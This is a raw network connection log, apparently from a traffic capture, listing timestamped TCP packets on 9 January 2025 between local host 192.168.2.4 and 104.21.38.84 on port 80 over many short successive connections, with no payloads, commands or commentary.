Jan 9, 2025 18:12:15.000438929 CET	80	49732	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:15.000447989 CET	80	49732	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:15.000598907 CET	49732	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:15.095347881 CET	80	49732	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:15.143450975 CET	49732	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:15.842602968 CET	49732	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:15.847511053 CET	80	49732	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:15.940282106 CET	80	49732	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:15.940675974 CET	49732	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:15.945550919 CET	80	49732	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:16.188184023 CET	80	49732	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:16.237196922 CET	49732	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:16.429460049 CET	49732	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:16.434731007 CET	80	49732	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:16.434794903 CET	49732	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:16.436352968 CET	49736	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:16.436666965 CET	49737	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:16.441302061 CET	80	49736	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:16.441382885 CET	49736	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:16.441507101 CET	49736	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:16.441708088 CET	80	49737	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:16.441766024 CET	49737	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:16.441854954 CET	49737	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:16.444128990 CET	49736	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:16.446352959 CET	80	49736	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:16.446702003 CET	80	49737	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:16.489470959 CET	80	49736	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:16.562010050 CET	49738	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:16.567214966 CET	80	49738	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:16.568389893 CET	49738	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:16.573610067 CET	49738	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:16.579518080 CET	80	49738	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:16.800055027 CET	49737	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:16.804965019 CET	80	49737	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:16.805042982 CET	80	49737	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:16.888597965 CET	80	49736	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:16.894653082 CET	49736	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:16.924978018 CET	49738	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:16.930572987 CET	80	49738	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:16.964343071 CET	80	49737	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:17.019329071 CET	49737	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:17.092209101 CET	80	49738	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:17.143693924 CET	49738	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:17.216260910 CET	80	49737	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:17.269212008 CET	49737	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:17.324870110 CET	80	49738	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:17.378544092 CET	49738	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:17.453054905 CET	49737	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:17.453475952 CET	49738	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:17.453905106 CET	49740	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:17.458024025 CET	80	49737	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:17.458369970 CET	49737	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:17.458470106 CET	80	49738	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:17.458528996 CET	49738	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:17.458771944 CET	80	49740	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:17.459099054 CET	49740	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:17.459466934 CET	49740	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:17.464294910 CET	80	49740	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:17.815519094 CET	49740	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:17.820821047 CET	80	49740	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:17.943346024 CET	80	49740	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:17.987334013 CET	49740	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:18.179482937 CET	80	49740	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:18.180298090 CET	49740	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:18.185589075 CET	80	49740	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:18.185662031 CET	49740	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:18.302454948 CET	49741	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:18.307532072 CET	80	49741	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:18.307614088 CET	49741	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:18.307718992 CET	49741	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:18.312638044 CET	80	49741	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:18.659293890 CET	49741	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:18.664372921 CET	80	49741	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:18.753211975 CET	80	49741	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:18.799853086 CET	49741	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:19.236579895 CET	80	49741	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:19.282242060 CET	49741	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:19.358398914 CET	49741	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:19.358861923 CET	49742	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:19.363961935 CET	80	49741	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:19.364128113 CET	80	49742	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:19.364228964 CET	49741	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:19.364259005 CET	49742	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:19.364370108 CET	49742	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:19.369451046 CET	80	49742	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:19.721779108 CET	49742	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:19.727266073 CET	80	49742	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:19.847570896 CET	80	49742	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:19.893693924 CET	49742	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:20.091801882 CET	80	49742	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:20.143601894 CET	49742	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:20.221976042 CET	49742	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:20.223664999 CET	49743	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:20.227215052 CET	80	49742	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:20.227289915 CET	49742	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:20.228526115 CET	80	49743	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:20.228601933 CET	49743	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:20.228708029 CET	49743	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:20.233462095 CET	80	49743	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:20.581296921 CET	49743	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:20.589174032 CET	80	49743	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:20.674922943 CET	80	49743	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:20.721590996 CET	49743	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:20.914527893 CET	80	49743	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:20.956089020 CET	49743	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:21.038872957 CET	49743	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:21.039660931 CET	49744	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:21.044193029 CET	80	49743	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:21.044275045 CET	49743	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:21.044569969 CET	80	49744	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:21.044640064 CET	49744	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:21.044698000 CET	49744	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:21.049537897 CET	80	49744	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:21.393523932 CET	49744	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:21.399955988 CET	80	49744	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:21.508826971 CET	80	49744	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:21.549784899 CET	49744	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:21.884931087 CET	80	49744	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:21.940561056 CET	49744	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:21.998347998 CET	49744	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:21.999047041 CET	49745	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:22.003776073 CET	80	49744	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:22.003837109 CET	49744	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:22.003958941 CET	80	49745	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:22.004029989 CET	49745	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:22.004128933 CET	49745	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:22.008902073 CET	80	49745	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:22.222662926 CET	49745	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:22.223468065 CET	49746	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:22.228374004 CET	80	49746	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:22.228452921 CET	49746	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:22.228629112 CET	49746	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:22.233480930 CET	80	49746	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:22.269697905 CET	80	49745	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:22.348520041 CET	49747	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:22.353632927 CET	80	49747	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:22.353760958 CET	49747	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:22.353868961 CET	49747	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:22.358659983 CET	80	49747	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:22.393955946 CET	80	49745	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:22.396955013 CET	49745	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:22.581068039 CET	49746	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:22.586219072 CET	80	49746	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:22.586347103 CET	80	49746	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:22.706229925 CET	49747	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:22.709880114 CET	80	49746	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:22.711288929 CET	80	49747	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:22.752918005 CET	49746	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:22.798137903 CET	80	49747	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:22.846749067 CET	49747	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:22.962862015 CET	80	49746	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:23.003087044 CET	49746	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:23.040123940 CET	80	49747	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:23.081016064 CET	49747	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:23.156478882 CET	49746	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:23.156590939 CET	49747	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:23.157135963 CET	49748	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:23.162235022 CET	80	49746	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:23.162275076 CET	80	49747	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:23.162295103 CET	49746	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:23.162307978 CET	80	49748	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:23.162347078 CET	49747	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:23.162400961 CET	49748	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:23.162596941 CET	49748	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:23.167484999 CET	80	49748	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:23.518791914 CET	49748	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:23.525118113 CET	80	49748	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:23.694853067 CET	80	49748	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:23.737242937 CET	49748	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:23.854954958 CET	80	49748	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:23.909293890 CET	49748	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:23.967494965 CET	49748	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:23.968322039 CET	49749	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:23.972671032 CET	80	49748	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:23.972754002 CET	49748	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:23.973202944 CET	80	49749	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:23.973277092 CET	49749	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:23.973371983 CET	49749	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:23.978121996 CET	80	49749	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:24.332957983 CET	49749	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:24.338054895 CET	80	49749	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:24.426219940 CET	80	49749	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:24.472404957 CET	49749	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:24.688862085 CET	80	49749	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:24.737375975 CET	49749	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:24.915999889 CET	49749	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:24.918576956 CET	49750	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:24.921107054 CET	80	49749	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:24.921173096 CET	49749	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:24.923471928 CET	80	49750	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:24.923546076 CET	49750	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:24.923877001 CET	49750	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:24.928649902 CET	80	49750	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:25.268759966 CET	49750	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:25.273700953 CET	80	49750	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:25.368781090 CET	80	49750	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:25.409135103 CET	49750	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:25.626115084 CET	80	49750	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:25.674838066 CET	49750	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:25.750207901 CET	49750	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:25.750921011 CET	49751	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:25.755352020 CET	80	49750	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:25.755420923 CET	49750	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:25.755750895 CET	80	49751	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:25.755920887 CET	49751	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:25.756087065 CET	49751	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:25.760860920 CET	80	49751	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:26.112626076 CET	49751	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:26.117502928 CET	80	49751	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:26.229671001 CET	80	49751	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:26.280162096 CET	49751	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:26.470099926 CET	80	49751	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:26.518472910 CET	49751	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:26.602777004 CET	49751	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:26.603575945 CET	49752	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:26.608462095 CET	80	49752	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:26.608530998 CET	49752	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:26.608690977 CET	49752	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:26.613432884 CET	80	49752	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:26.618379116 CET	80	49751	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:26.618427992 CET	49751	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:26.956177950 CET	49752	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:27.105690956 CET	80	49752	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:27.133966923 CET	80	49752	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:27.174813986 CET	49752	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:27.452833891 CET	80	49752	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:27.502921104 CET	49752	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:27.644517899 CET	49752	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:27.645081043 CET	49753	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:27.649617910 CET	80	49752	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:27.649674892 CET	49752	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:27.649954081 CET	80	49753	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:27.650024891 CET	49753	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:27.650122881 CET	49753	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:27.654890060 CET	80	49753	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:27.972187996 CET	49753	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:27.972793102 CET	49754	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:27.978120089 CET	80	49754	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:27.978209972 CET	49754	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:27.978261948 CET	49754	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:27.983328104 CET	80	49754	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:28.018591881 CET	80	49753	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:28.018790007 CET	49753	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:28.091878891 CET	49755	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:28.096791983 CET	80	49755	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:28.096868038 CET	49755	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:28.096930981 CET	49755	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:28.101743937 CET	80	49755	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:28.331053019 CET	49754	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:28.336149931 CET	80	49754	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:28.336163044 CET	80	49754	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:28.443140030 CET	80	49754	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:28.456125975 CET	49755	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:28.462340117 CET	80	49755	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:28.487332106 CET	49754	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:28.546715975 CET	80	49755	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:28.596776009 CET	49755	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:28.690781116 CET	80	49754	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:28.737293959 CET	49754	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:28.852660894 CET	80	49755	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:28.893472910 CET	49755	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:28.967420101 CET	49754	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:28.967695951 CET	49755	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:28.968183041 CET	49756	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:28.972469091 CET	80	49754	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:28.972685099 CET	80	49755	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:28.972728014 CET	49754	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:28.972750902 CET	49755	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:28.973056078 CET	80	49756	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:28.973120928 CET	49756	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:28.973207951 CET	49756	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:28.977968931 CET	80	49756	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:29.331095934 CET	49756	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:29.336235046 CET	80	49756	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:29.530031919 CET	80	49756	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:29.581105947 CET	49756	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:29.804415941 CET	80	49756	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:29.846685886 CET	49756	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:30.283430099 CET	49757	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:30.288357019 CET	80	49757	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:30.288440943 CET	49757	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:30.289300919 CET	49757	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:30.294084072 CET	80	49757	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:30.643588066 CET	49757	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:30.648622036 CET	80	49757	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:30.880928040 CET	80	49757	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:30.924760103 CET	49757	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:31.149405003 CET	80	49757	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:31.190541983 CET	49757	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:31.265697956 CET	49757	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:31.266242027 CET	49758	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:31.270843983 CET	80	49757	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:31.270941973 CET	49757	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:31.271121979 CET	80	49758	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:31.271209002 CET	49758	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:31.271294117 CET	49758	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:31.276072979 CET	80	49758	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:31.628072977 CET	49758	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:31.633358955 CET	80	49758	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:31.788153887 CET	80	49758	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:31.831095934 CET	49758	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:33.069190979 CET	80	49758	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:33.112519026 CET	49758	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:33.194293022 CET	49758	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:33.195059061 CET	49759	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:33.199676991 CET	80	49758	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:33.199736118 CET	49758	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:33.200122118 CET	80	49759	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:33.200189114 CET	49759	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:33.200278044 CET	49759	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:33.205096006 CET	80	49759	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:33.550153017 CET	49759	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:33.555094004 CET	80	49759	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:33.664176941 CET	80	49759	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:33.706302881 CET	49759	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:33.707439899 CET	49760	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:33.708043098 CET	49759	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:33.712290049 CET	80	49760	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:33.712348938 CET	49760	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:33.712440014 CET	49760	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:33.712965965 CET	80	49759	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:33.713017941 CET	49759	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:33.717240095 CET	80	49760	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:33.824768066 CET	49761	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:33.829752922 CET	80	49761	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:33.829857111 CET	49761	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:33.829931021 CET	49761	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:33.834691048 CET	80	49761	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:34.065577030 CET	49760	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:34.070508003 CET	80	49760	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:34.070528984 CET	80	49760	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:34.165041924 CET	80	49760	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:34.175106049 CET	49761	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:34.180078983 CET	80	49761	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:34.206063032 CET	49760	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:34.332153082 CET	80	49761	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:34.356618881 CET	80	49760	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:34.377832890 CET	49761	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:34.409291029 CET	49760	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:34.583226919 CET	80	49761	104.21.38.84	192.168.2.4
